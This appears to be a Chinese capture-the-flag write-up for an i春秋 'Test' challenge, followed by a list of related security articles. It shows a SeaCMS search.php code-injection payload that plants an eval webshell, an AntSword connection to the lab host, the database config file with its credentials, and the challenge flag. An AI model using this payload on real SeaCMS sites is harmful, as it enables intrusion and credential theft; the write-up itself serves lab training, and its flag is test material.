i春秋-Test

题目


解题

参考WP

复制代码
https://blog.csdn.net/qq_40654505/article/details/107142533/

目录扫描

复现wp

payload为:

复制代码
search.php?searchtype=5&tid=&area=eval($_POST[cmd])

使用蚁剑连接

复制代码
http://eci-2ze4iyhwj7xvb68bsb2t.cloudeci1.ichunqiu.com:80/search.php?searchtype=5&tid=&area=eval($_POST[cmd])

cmd

找到数据库配置文件,/var/www/html/data/common.inc.php

复制代码
<?php
//数据库连接信息
$cfg_dbhost = '127.0.0.1';
$cfg_dbname = 'seacms';
$cfg_dbuser = 'sea_user';
$cfg_dbpwd = '46e06533407e';
$cfg_dbprefix = 'sea_';
$cfg_db_language = 'utf8';
?>

鼠标右击这条shell,选择数据操作,添加上面的数据库用户名和密码连接数据库


复制代码
flag{d2317097-0b48-4bbc-a968-90ec76ac67ea}
相关推荐
HackTwoHub1 天前
ARL灯塔重构版:支持APP/小程序/WEB资产同步扫描
人工智能·安全·web安全·网络安全·小程序·重构·自动化
ccino .1 天前
Hackerone-地址栏xss
网络安全·xss
数据知道1 天前
网络安全工具箱:100+ 工具分类速查与选型建议
安全·web安全·网络安全
txg6661 天前
路径级持久化模糊测试:XSSky 如何精准击破 XSS 漏洞
深度学习·安全·web安全·网络安全·xss
红信鸽1 天前
2026 年 AI 钓鱼攻击现状与防御深度解析
网络安全
技术不好的崎鸣同学1 天前
[ACTF2020 新生赛]Include 思路及解法
算法·安全·web安全
你觉得脆皮鸡好吃吗1 天前
OAuth学习 下
网络·安全·web安全·网络安全学习
飞斯柯罗1 天前
[飞斯柯罗] 想了解什么是网络安全资产和 KMS?
网络·安全·web安全
数据知道1 天前
安全实验室搭建指南:一台电脑搭出完整靶场环境
安全·网络安全·电脑
kali-Myon2 天前
某校园门禁系统高危 SQL 注入漏洞挖掘复盘
数据库·sql·安全·web安全